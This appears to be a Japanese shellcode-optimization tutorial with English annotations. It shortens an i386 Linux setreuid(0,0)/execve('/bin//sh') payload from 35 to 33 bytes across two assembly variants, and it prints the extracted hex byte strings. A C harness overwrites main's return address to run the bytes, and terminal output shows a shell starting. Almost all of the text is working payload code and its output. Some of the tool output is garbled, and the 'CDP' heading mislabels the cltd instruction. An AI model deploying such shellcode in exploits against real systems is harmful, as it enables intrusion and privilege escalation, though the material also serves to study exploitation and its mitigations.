○システムコール番号のPUSHによる生成
-----
# Variant 1: the syscall number is produced with pushl imm8 / pop (3 bytes:
# 6a 46 58, see the extracted bytes below). The page reports this is one byte
# shorter than the previous variant, which is not shown here.
.global main
main:
#setreuid
# setreuid(0, 0): %ebx and %ecx are the first two syscall arguments, 0x46 = 70
# is the i386 setreuid number, int $0x80 enters the kernel.
xorl %ebx, %ebx
xorl %ecx, %ecx
pushl $0x46
pop %eax
int $0x80
#execve
# execve(path, argv, envp): the two pushl immediates are the eight bytes of
# the path string (2f 2f 73 68 / 2f 62 69 6e in the dump) and the earlier
# pushl %eax (0) is its NUL terminator; %ebx -> path, %ecx -> {path, NULL},
# %edx = envp = NULL, %al = 0xb = execve.
xorl %eax, %eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
xorl %edx, %edx
movb $0xb, %al
int $0x80
-----
defolos@glazheim:~/Desktop$ gcc tiny-sh1.s -Wall
defolos@glazheim:~/Desktop$ objdump -d a.out|grep \ -A 30 > test.txt
defolos@glazheim:~/Desktop$ ./codec.exe test.txt
[extracted code]
31 db 31 c9 6a 46 58 cd 80 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 31 d2 b0 0b cd 80 90 90 90 90 90 90 90 90 90 90 55 89 e5 4@_4@
[converted code]
\x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x89\xe5\x4@_4
-----
/*
 * payload: the 34 bytes of the listing above, up to and including the final
 * `cd 80`. The trailing 0x90 padding and what looks like the next function's
 * prologue (55 89 e5), which codec.exe also picked up from the objdump text,
 * are dropped here.
 */
unsigned char payload[]="\x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
/*
 * Test harness for the byte string. main() has a single local, so with the
 * classic i386 frame layout the saved return address is two words above
 * &retadd (&retadd -> saved %ebp -> return address); the store replaces it
 * with the address of payload, and main's `ret` continues at those bytes
 * instead of returning to the C runtime.
 *
 * This depends entirely on the environment of the transcript (i386, an old
 * gcc, sh-2.05b): it assumes a pointer fits in int (ILP32), that nothing sits
 * between the local and the saved %ebp (a stack canary from -fstack-protector
 * would presumably be overwritten and abort the process before `ret`, and
 * -fomit-frame-pointer or a different local layout moves the +2 target), and
 * that the .data segment holding payload is executable. With NX/W^X enabled
 * the jump into payload faults - which is the reason those mitigations exist.
 * (*retadd) = (int)payload also truncates on any platform where sizeof(void *)
 * != sizeof(int); gcc -Wall on the second run below does not warn because the
 * cast is explicit.
 */
int main(void){
    int *retadd;
    retadd = (int *)&retadd + 2;   /* presumed slot of the saved return address - layout-dependent */
    (*retadd) = (int)payload;
    return 0;
}
-----
defolos@glazheim:~$ gcc test.c
defolos@glazheim:~$ ./a.out
sh-2.05b$
35バイトから34バイトに縮小され、正常にシェルが起動する事が確認できた。
○CDP命令の活用
-----
# Variant 2: identical to variant 1 except that `xorl %edx, %edx` (2 bytes,
# 31 d2) is replaced by `cltd` (1 byte, 99).
# NOTE(review): the heading above says "CDP"; the instruction actually used is
# cltd (Intel mnemonic cdq).
.global main
main:
#setreuid
xorl %ebx, %ebx
xorl %ecx, %ecx
pushl $0x46
pop %eax
int $0x80
#execve
xorl %eax, %eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
# cltd sign-extends %eax into %edx:%eax. None of the push/mov instructions
# since `xorl %eax, %eax` touch %eax, so it is still 0 and %edx becomes 0
# (envp = NULL) in one byte instead of two.
cltd
movb $0xb, %al
int $0x80
-----
defolos@glazheim:~/Desktop$ ./codec.exe test.txt
[extracted code]
31 db 31 c9 6a 46 58 cd 80 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 99 b0 0b cd 80 90 90 90 90 90 90 90 90 90 90 90 55
[converted code]
\x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x
-----
unsigned char
payload[]="\x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(void){
    int *retadd;
    retadd = (int *)&retadd + 2;
    (*retadd) = (int)payload;
    return 0;
}
-----
defolos@glazheim:~$ gcc -Wall test.c
defolos@glazheim:~$ ./a.out
sh-2.05b$
34バイトが33バイトに短縮され、正常に動作する事が確認できた。